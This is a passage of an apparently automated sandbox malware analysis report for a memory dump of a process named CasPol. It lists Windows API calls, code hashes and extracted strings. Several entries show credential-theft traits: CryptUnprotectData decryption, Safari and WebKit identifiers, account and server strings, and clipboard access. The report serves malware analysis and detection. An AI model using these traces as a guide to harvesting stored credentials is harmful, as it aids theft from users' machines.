                                                                                                                    • API ID: FreeLibrary
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3664257935-0
                                                                                                                    • Opcode ID: 844f7501f44133ba018c3401d7aef3826eb6c790b17bce713828cee3c51aa695
                                                                                                                    • Instruction ID: 97b2006ec1e2dd28fddd19cbcf35086f2a6b1d7d6d8af37d8808782836c913ed
                                                                                                                    • Opcode Fuzzy Hash: 844f7501f44133ba018c3401d7aef3826eb6c790b17bce713828cee3c51aa695
                                                                                                                    • Instruction Fuzzy Hash: C1C04C355107129BE7318F22C849793B3E8BB00767F40C818A56A85454D7BCE594CE28
                                                                                                                    APIs
                                                                                                                    • EnumResourceNamesW.KERNELBASE(?,?,Function_000148B6,00000000), ref: 0041494B
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000B.00000002.2474939299.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_11_2_400000_CasPol.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: EnumNamesResource
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3334572018-0
                                                                                                                    • Opcode ID: 66f1156765df5e37ef2ff2f84c2d9879992723494834984b76c3e66af834c78a
                                                                                                                    • Instruction ID: 4cd0fc1a45efe5f4a77ff86a676eea9814a6d41529a344ef69fdb726e0e13cac
                                                                                                                    • Opcode Fuzzy Hash: 66f1156765df5e37ef2ff2f84c2d9879992723494834984b76c3e66af834c78a
                                                                                                                    • Instruction Fuzzy Hash: 5CC09B355943819FD711DF108C05F1A76D5BF95705F104C397151940A0C7614014A60A
                                                                                                                    APIs
                                                                                                                    • FreeLibrary.KERNELBASE(?), ref: 0044DEB6
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000B.00000002.2474939299.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_11_2_400000_CasPol.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: FreeLibrary
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3664257935-0
                                                                                                                    • Opcode ID: bc29afbdeb633a61cc40634aee98d5405fe4c9068b08d77425fcd78e2ed3a7cd
                                                                                                                    • Instruction ID: c12df66a07a312a107e4de7a98dbd39cb061029a89fa16cd2619b088cce9516a
                                                                                                                    • Opcode Fuzzy Hash: bc29afbdeb633a61cc40634aee98d5405fe4c9068b08d77425fcd78e2ed3a7cd
                                                                                                                    • Instruction Fuzzy Hash: 95C04C35D10311ABFB31AB11ED4975232A5BB00717F52006494128D065D7B8E454CB2D
                                                                                                                    APIs
                                                                                                                    • FindClose.KERNELBASE(?,0040AE21,?,00000000,00445EF5,*.*,?,00000000,?,00000104,?,?,?,?,?,00000104), ref: 0040AEC8
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000B.00000002.2474939299.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_11_2_400000_CasPol.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: CloseFind
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1863332320-0
                                                                                                                    • Opcode ID: c351b702f3e9cabc65afcca29c8835cc335007c1b5069ed2425bca2f993f3ba3
                                                                                                                    • Instruction ID: 0a5868f0c47a417661f40efe111cada53839b745ef6d73ffe26d621af3302058
                                                                                                                    • Opcode Fuzzy Hash: c351b702f3e9cabc65afcca29c8835cc335007c1b5069ed2425bca2f993f3ba3
                                                                                                                    • Instruction Fuzzy Hash: 06C092341506058BD62C5F38DC9A42A77A0BF4A3303B40F6CA0F3D24F0E73888538A04
                                                                                                                    APIs
                                                                                                                    • RegOpenKeyExW.KERNELBASE(80000002,80000002,00000000,00020019,80000002,00414CC1,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00445DDE,?,?,00000000), ref: 004145A5
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000B.00000002.2474939299.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_11_2_400000_CasPol.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Open
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 71445658-0
                                                                                                                    • Opcode ID: cea4c8dffb5a7e03adddd135b873dbda16caaf5da1da7b073e7ed9ea122c33c6
                                                                                                                    • Instruction ID: 4e31294bd56c0fd8f54a78566f459ab053e1b17b284f5820c9a90ca28514d216
                                                                                                                    • Opcode Fuzzy Hash: cea4c8dffb5a7e03adddd135b873dbda16caaf5da1da7b073e7ed9ea122c33c6
                                                                                                                    • Instruction Fuzzy Hash: C4C09B35544311BFDE114F40FD09F09BB61BB84B05F004414B254640B182714414EB17
                                                                                                                    APIs
                                                                                                                    • GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000B.00000002.2474939299.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_11_2_400000_CasPol.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AttributesFile
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3188754299-0
                                                                                                                    • Opcode ID: 58881c252121c77da0d0db5638804f50f66f4a7a85cb6d231bcd6b2301be346c
                                                                                                                    • Instruction ID: 3e515636d229e53f9e638efbf3d1d2cf0185fd636b5c9b7db17c068ea44c501e
                                                                                                                    • Opcode Fuzzy Hash: 58881c252121c77da0d0db5638804f50f66f4a7a85cb6d231bcd6b2301be346c
                                                                                                                    • Instruction Fuzzy Hash: B9B012792104005BCB0807349C4904D35507F456317200B3CF033C00F0D730CC61BA00
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000B.00000002.2474939299.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_11_2_400000_CasPol.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 519045b8856ea86e6d8d1e97e8a9a2cac293cdb0bbecd69caab4774d1a49c2e8
                                                                                                                    • Instruction ID: 186a7b248be49691fb09735f75239c469d17650efe27a5986e87276cb9a2b443
                                                                                                                    • Opcode Fuzzy Hash: 519045b8856ea86e6d8d1e97e8a9a2cac293cdb0bbecd69caab4774d1a49c2e8
                                                                                                                    • Instruction Fuzzy Hash: E8318B31901616EFDF24AF25D8417DA73A0FF04314F10416BF91497251DB38ADE18BDA
                                                                                                                    APIs
                                                                                                                    • memset.MSVCRT ref: 004095FC
                                                                                                                      • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                                      • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                                      • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                                      • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                                      • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                                                                      • Part of subcall function 004091B8: memset.MSVCRT ref: 004091E2
                                                                                                                      • Part of subcall function 004091B8: memcpy.MSVCRT(?,00000000,?,?,?,?,?,?,?,?,?,?,00000143,00000000), ref: 004092C9
                                                                                                                      • Part of subcall function 004091B8: memcmp.MSVCRT(00000000,0045A4F0,00000006,?,?,?,?,?,?,?,?,?,?,?,?,00000143), ref: 004092D9
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000B.00000002.2474939299.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_11_2_400000_CasPol.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: memsetwcslen$AttributesFilememcmpmemcpywcscatwcscpy
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3655998216-0
                                                                                                                    • Opcode ID: e30004be4bbbfeced16a1849f7c4d541b3adc094efc719b7744e08ea692a1bc4
                                                                                                                    • Instruction ID: 072a19641c33d96fdc78833b4ff670bebeeceb9371718ab52934a970b5968781
                                                                                                                    • Opcode Fuzzy Hash: e30004be4bbbfeced16a1849f7c4d541b3adc094efc719b7744e08ea692a1bc4
                                                                                                                    • Instruction Fuzzy Hash: F311607290021D6AEF20A662DC4AE9B376CEF41318F10047BB908E51D2EA79DE548659
                                                                                                                    APIs
                                                                                                                    • memset.MSVCRT ref: 00445426
                                                                                                                      • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                                      • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                                      • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                                      • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                                      • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                                                                      • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B71C
                                                                                                                      • Part of subcall function 0040B6EF: wcsrchr.MSVCRT ref: 0040B738
                                                                                                                      • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B756
                                                                                                                      • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B7F5
                                                                                                                      • Part of subcall function 0040B6EF: CreateFileW.KERNELBASE(00445FAE,80000000,00000000,00000000,00000003,00000000,00000000,?,?), ref: 0040B80C
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000B.00000002.2474939299.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_11_2_400000_CasPol.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: memset$Filewcslen$AttributesCreatewcscatwcscpywcsrchr
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1828521557-0
                                                                                                                    • Opcode ID: ea4a949cbb04dc179977b6e9e50e7a1e4e6e0668b18cbdf2d6b9d2270a501428
                                                                                                                    • Instruction ID: 9d1500c39017731ad640c46c84131142cb98d7893e2d711cbdbff08f65233ce4
                                                                                                                    • Opcode Fuzzy Hash: ea4a949cbb04dc179977b6e9e50e7a1e4e6e0668b18cbdf2d6b9d2270a501428
                                                                                                                    • Instruction Fuzzy Hash: 4B1186B294011D7BEB10E751DC4AFDB776CEF51328F10047FB518A50C2E6B8AAC486A9
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000B.00000002.2474939299.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_11_2_400000_CasPol.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: _wcsicmp
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2081463915-0
                                                                                                                    • Opcode ID: b978923b786281d4dff967b9753de8351d719aa9e76d1b7e7943c841c1b1a5dc
                                                                                                                    • Instruction ID: 44e68c08f8902dbc9d3bec9e3d7b81d72528a2b8c41660eeece459a1934edfa0
                                                                                                                    • Opcode Fuzzy Hash: b978923b786281d4dff967b9753de8351d719aa9e76d1b7e7943c841c1b1a5dc
                                                                                                                    • Instruction Fuzzy Hash: 0C118CB1600205AFD710DF65C8809AAB7F8FF44314F11843EE55AE7240EB34F9658B68
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 00406294: CloseHandle.KERNEL32(000000FF,00406224,00000000,00000000,0040E03C,?,00000000,00000104,00000000,?,?,?,0040E521,?,0040E6A3,000000FF), ref: 0040629C
                                                                                                                      • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                                                                                    • GetLastError.KERNEL32(00000000,00000000,0040E03C,?,00000000,00000104,00000000,?,?,?,0040E521,?,0040E6A3,000000FF,?,00000104), ref: 00406281
                                                                                                                      • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000B.00000002.2474939299.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_11_2_400000_CasPol.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: File$CloseCreateErrorHandleLastRead
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2136311172-0
                                                                                                                    • Opcode ID: b6bd1096ce10d17f9a7701a6d0a27b928aedeb77931263aba22673ea05e1db24
                                                                                                                    • Instruction ID: 5eec059ee86d0bbb8aaa5289f200f29bbda103cdac5cb86a40c163b72aa3aa4c
                                                                                                                    • Opcode Fuzzy Hash: b6bd1096ce10d17f9a7701a6d0a27b928aedeb77931263aba22673ea05e1db24
                                                                                                                    • Instruction Fuzzy Hash: 3F01D6B14017018FD7206B70CD05BA273D8EF10319F11897EE55BE62D1EB3C9861866E
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 0040B04B: ??3@YAXPAX@Z.MSVCRT(00000000,00401B44,0044E518,?,00000001,00401B95,?,00401EE4), ref: 0040B052
                                                                                                                    • ??2@YAPAXI@Z.MSVCRT(00000001,00000001,00401E7F), ref: 0040AFD8
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000B.00000002.2474939299.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_11_2_400000_CasPol.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ??2@??3@
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1936579350-0
                                                                                                                    • Opcode ID: d9146978952df4032bb52ee1fc914549b8afd9994305f4c2f79ca13836f6df5d
                                                                                                                    • Instruction ID: 89dc8af08517091935dcea8fd058adf4401913b4726dbdea6cb301b2924d739e
                                                                                                                    • Opcode Fuzzy Hash: d9146978952df4032bb52ee1fc914549b8afd9994305f4c2f79ca13836f6df5d
                                                                                                                    • Instruction Fuzzy Hash: 8FC02B7240C2100FD730FF74340205736D4CE422203028C2FE0E4D3101DB3C840103C8
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000B.00000002.2474939299.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_11_2_400000_CasPol.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: free
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1294909896-0
                                                                                                                    • Opcode ID: 064fc9ad2ab7598503b0803575f79bda8c80cd2f5cc7d751fc92f1905ed38621
                                                                                                                    • Instruction ID: 84c58710a9e867f17c2d1ed9f7495b278bdfae561cd9e9721482330d0bfefd66
                                                                                                                    • Opcode Fuzzy Hash: 064fc9ad2ab7598503b0803575f79bda8c80cd2f5cc7d751fc92f1905ed38621
                                                                                                                    • Instruction Fuzzy Hash: 48C00272510B018FEB209E16C405762B3E4AF5173BF928C1D949591481D77CE4448A1D
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000B.00000002.2474939299.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_11_2_400000_CasPol.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: free
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1294909896-0
                                                                                                                    • Opcode ID: 724fdfa704f09a621e121349248af22099a797a76fc60927f41904971c9b5f98
                                                                                                                    • Instruction ID: 146ea39d6618054f0b1de7ea1636ea0e57db3b52e0d7afa8327ef8e2ad9437d0
                                                                                                                    • Opcode Fuzzy Hash: 724fdfa704f09a621e121349248af22099a797a76fc60927f41904971c9b5f98
                                                                                                                    • Instruction Fuzzy Hash: 18C012B29107018BFB308E15C409322B2E4AF0072BFA18C0D9090910C2C77CD080CA18
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000B.00000002.2474939299.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_11_2_400000_CasPol.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: free
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1294909896-0
                                                                                                                    • Opcode ID: c64955702a5dc36c53a796a23ab56cc8adc6c768dfa77ba71ac51c435adf9ecd
                                                                                                                    • Instruction ID: e7ff0dbf640816315c9486a8db62c76896ac9b8339bf6d895034c27267ad2de3
                                                                                                                    • Opcode Fuzzy Hash: c64955702a5dc36c53a796a23ab56cc8adc6c768dfa77ba71ac51c435adf9ecd
                                                                                                                    • Instruction Fuzzy Hash: A5A022A200820023CC00AB3CCC02A0A33880EE323EB320B0EB032C20C2CF38C830B00E
                                                                                                                    APIs
                                                                                                                    • EmptyClipboard.USER32 ref: 004098EC
                                                                                                                      • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                                                                                    • GetFileSize.KERNEL32(00000000,00000000), ref: 00409909
                                                                                                                    • GlobalAlloc.KERNEL32(00002000,00000002), ref: 0040991A
                                                                                                                    • GlobalLock.KERNEL32(00000000), ref: 00409927
                                                                                                                    • ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 0040993A
                                                                                                                    • GlobalUnlock.KERNEL32(00000000), ref: 0040994C
                                                                                                                    • SetClipboardData.USER32(0000000D,00000000), ref: 00409955
                                                                                                                    • GetLastError.KERNEL32 ref: 0040995D
                                                                                                                    • CloseHandle.KERNEL32(?), ref: 00409969
                                                                                                                    • GetLastError.KERNEL32 ref: 00409974
                                                                                                                    • CloseClipboard.USER32 ref: 0040997D
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000B.00000002.2474939299.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_11_2_400000_CasPol.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ClipboardFileGlobal$CloseErrorLast$AllocCreateDataEmptyHandleLockReadSizeUnlock
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3604893535-0
                                                                                                                    • Opcode ID: 92cf2ad6ca5c713dde206082ad36a5e7808ef459d862ee33826dd65d962f9f86
                                                                                                                    • Instruction ID: b216396755dc4e0bfb1664a9ae46c4c33dbc75b884417c11e98c88a04b476fe2
                                                                                                                    • Opcode Fuzzy Hash: 92cf2ad6ca5c713dde206082ad36a5e7808ef459d862ee33826dd65d962f9f86
                                                                                                                    • Instruction Fuzzy Hash: 3D113D7A540204BBE7105FA6DC4CA9E7B78FB06356F10457AF902E22A1DB748901CB69
                                                                                                                    APIs
                                                                                                                    • EmptyClipboard.USER32 ref: 00409882
                                                                                                                    • wcslen.MSVCRT ref: 0040988F
                                                                                                                    • GlobalAlloc.KERNEL32(00002000,00000002,?,?,?,?,00411A1E,-00000210), ref: 0040989F
                                                                                                                    • GlobalLock.KERNEL32(00000000), ref: 004098AC
                                                                                                                    • memcpy.MSVCRT(00000000,?,00000002,?,?,?,00411A1E,-00000210), ref: 004098B5
                                                                                                                    • GlobalUnlock.KERNEL32(00000000), ref: 004098BE
                                                                                                                    • SetClipboardData.USER32(0000000D,00000000), ref: 004098C7
                                                                                                                    • CloseClipboard.USER32 ref: 004098D7
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000B.00000002.2474939299.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_11_2_400000_CasPol.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ClipboardGlobal$AllocCloseDataEmptyLockUnlockmemcpywcslen
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1213725291-0
                                                                                                                    • Opcode ID: ef81b411bc32b98b0d58beac2f1626bda71a649682fb6f24e39e44ffb2f3f244
                                                                                                                    • Instruction ID: b754b6ca90195c8d8a6f67e3e00c953256c5cf8724ac1a445a604cc17dd28da6
                                                                                                                    • Opcode Fuzzy Hash: ef81b411bc32b98b0d58beac2f1626bda71a649682fb6f24e39e44ffb2f3f244
                                                                                                                    • Instruction Fuzzy Hash: 4AF0967B1402246BD2112FA6AC4DD2B772CFB86B56B05013AF90592251DA3448004779
                                                                                                                    APIs
                                                                                                                    • GetLastError.KERNEL32 ref: 004182D7
                                                                                                                      • Part of subcall function 0041739B: GetVersionExW.KERNEL32(?), ref: 004173BE
                                                                                                                    • FormatMessageW.KERNEL32(00001300,00000000,00000000,00000000,?,00000000,00000000), ref: 004182FE
                                                                                                                    • FormatMessageA.KERNEL32(00001300,00000000,00000000,00000000,?,00000000,00000000), ref: 00418327
                                                                                                                    • LocalFree.KERNEL32(?), ref: 00418342
                                                                                                                    • free.MSVCRT ref: 00418370
                                                                                                                      • Part of subcall function 00417434: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000,00000000,?,?,7591DF80,?,0041755F,?), ref: 00417452
                                                                                                                      • Part of subcall function 00417434: malloc.MSVCRT ref: 00417459
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000B.00000002.2474939299.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_11_2_400000_CasPol.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: FormatMessage$ByteCharErrorFreeLastLocalMultiVersionWidefreemalloc
                                                                                                                    • String ID: OsError 0x%x (%u)
                                                                                                                    • API String ID: 2360000266-2664311388
                                                                                                                    • Opcode ID: 4fd697d7e384524c9f2c5a32db345d7fa765ac123a5e8bcccc5a3c31b8d6871e
                                                                                                                    • Instruction ID: 20f22e5b187e4483f2e635e74e626e0383ca95cf640bb4168ff376264581b0c9
                                                                                                                    • Opcode Fuzzy Hash: 4fd697d7e384524c9f2c5a32db345d7fa765ac123a5e8bcccc5a3c31b8d6871e
                                                                                                                    • Instruction Fuzzy Hash: 6011B634901128FBCB11ABE2DC49CDF7F78FF85B54B10405AF811A2251DB754A81D7A9
                                                                                                                    APIs
                                                                                                                    • GetVersionExW.KERNEL32(?), ref: 004173BE
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000B.00000002.2474939299.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_11_2_400000_CasPol.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Version
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1889659487-0
                                                                                                                    • Opcode ID: 65fe17fce0a62211919799e39ce3b7c1e35ae55805528a641db57f2e5b506d3e
                                                                                                                    • Instruction ID: 34334e4c1a53cba42546035453d5331cf18162d9798f59f763323439a3546438
                                                                                                                    • Opcode Fuzzy Hash: 65fe17fce0a62211919799e39ce3b7c1e35ae55805528a641db57f2e5b506d3e
                                                                                                                    • Instruction Fuzzy Hash: BAE0463590131CCFEB24DB34DB0B7C676F5AB08B46F0104F4C20AC2092D3789688CA2A
                                                                                                                    APIs
                                                                                                                    • _wcsicmp.MSVCRT ref: 004022A6
                                                                                                                    • _wcsicmp.MSVCRT ref: 004022D7
                                                                                                                    • _wcsicmp.MSVCRT ref: 00402305
                                                                                                                    • _wcsicmp.MSVCRT ref: 00402333
                                                                                                                      • Part of subcall function 0040AA29: wcslen.MSVCRT ref: 0040AA3C
                                                                                                                      • Part of subcall function 0040AA29: memcpy.MSVCRT(?,?,00000000,00000001,00401B3C,0044E518,?,00000001,00401B95,?,00401EE4), ref: 0040AA5B
                                                                                                                    • memset.MSVCRT ref: 0040265F
                                                                                                                    • memcpy.MSVCRT(?,?,00000011), ref: 0040269B
                                                                                                                      • Part of subcall function 00404423: GetProcAddress.KERNEL32(?,00000000), ref: 00404453
                                                                                                                      • Part of subcall function 00404423: FreeLibrary.KERNEL32(00000000,00000141,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404476
                                                                                                                      • Part of subcall function 00404423: CryptUnprotectData.CRYPT32(?,00000000,?,00000000,00000000,?,?,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404498
                                                                                                                    • memcpy.MSVCRT(?,?,0000001C,?,?,00000000,?), ref: 004026FF
                                                                                                                    • LocalFree.KERNEL32(?,?,?,00000000,?,?,00000000,?), ref: 00402764
                                                                                                                    • FreeLibrary.KERNEL32(00000000,?,?,00000000,?), ref: 00402775
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000B.00000002.2474939299.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_11_2_400000_CasPol.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: _wcsicmp$Freememcpy$Library$AddressCryptDataLocalProcUnprotectmemsetwcslen
                                                                                                                    • String ID: !$#$$$&$&$'$)$/$0$2$8$=$>$>$@$A$Account$Data$F$H$H$I$K$K$L$O$Path$S$X$\$^$`$a$b$com.apple.Safari$com.apple.WebKit2WebProcess$g$h$n$n$q$server$t$t$t$u$u$w$y$y$z${$}$~
                                                                                                                    • API String ID: 2929817778-1134094380
                                                                                                                    • Opcode ID: 9397f4940cefbe0ceec442a857739dd93941f810d0ac8ce2dbc103f0b42f9f84
                                                                                                                    • Instruction ID: 24bcbd005531c38afe4d7004bd238553ea51a424b60caac2517de9c8923e7683
                                                                                                                    • Opcode Fuzzy Hash: 9397f4940cefbe0ceec442a857739dd93941f810d0ac8ce2dbc103f0b42f9f84
                                                                                                                    • Instruction Fuzzy Hash: 8FE1F32010C7C19DD332D678884978BBFD45BA7328F484B9EF1E89A2D2D7B98509C767
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000B.00000002.2474939299.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_11_2_400000_CasPol.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: _wcsicmpmemset$_wcsnicmpwcslen$ByteCharMultiWidewcschrwcscpy$memcpystrchrstrlen
                                                                                                                    • String ID: :stringdata$ftp://$http://$https://
                                                                                                                    • API String ID: 2787044678-1921111777
                                                                                                                    • Opcode ID: 5cfdb451540a99f12352c14b787623eda213fcfbf47060a2a7a9031bc80669e4
                                                                                                                    • Instruction ID: 1dd8f84a331a8d1f0195812dc1f06ff326a48265e58e3ad24d859c5fcdf3acb9
                                                                                                                    • Opcode Fuzzy Hash: 5cfdb451540a99f12352c14b787623eda213fcfbf47060a2a7a9031bc80669e4
                                                                                                                    • Instruction Fuzzy Hash: C191C571540219AEEF10EF65DC82EEF776DEF41318F01016AF948B7181EA38ED518BA9
                                                                                                                    APIs
                                                                                                                    • GetDlgItem.USER32(?,000003E9), ref: 0041402F
                                                                                                                    • GetDlgItem.USER32(?,000003E8), ref: 0041403B
                                                                                                                    • GetWindowLongW.USER32(00000000,000000F0), ref: 0041404A
                                                                                                                    • GetWindowLongW.USER32(?,000000F0), ref: 00414056
                                                                                                                    • GetWindowLongW.USER32(00000000,000000EC), ref: 0041405F
                                                                                                                    • GetWindowLongW.USER32(?,000000EC), ref: 0041406B
                                                                                                                    • GetWindowRect.USER32(00000000,?), ref: 0041407D
                                                                                                                    • GetWindowRect.USER32(?,?), ref: 00414088
                                                                                                                    • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 0041409C
                                                                                                                    • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 004140AA
                                                                                                                    • GetDC.USER32 ref: 004140E3
                                                                                                                    • wcslen.MSVCRT ref: 00414123
                                                                                                                    • GetTextExtentPoint32W.GDI32(?,00000000,00000000,?), ref: 00414134
                                                                                                                    • ReleaseDC.USER32(?,?), ref: 00414181
                                                                                                                    • _snwprintf.MSVCRT ref: 00414244
                                                                                                                    • SetWindowTextW.USER32(?,?), ref: 00414258
                                                                                                                    • SetWindowTextW.USER32(?,00000000), ref: 00414276
                                                                                                                    • GetDlgItem.USER32(?,00000001), ref: 004142AC
                                                                                                                    • GetWindowRect.USER32(00000000,?), ref: 004142BC
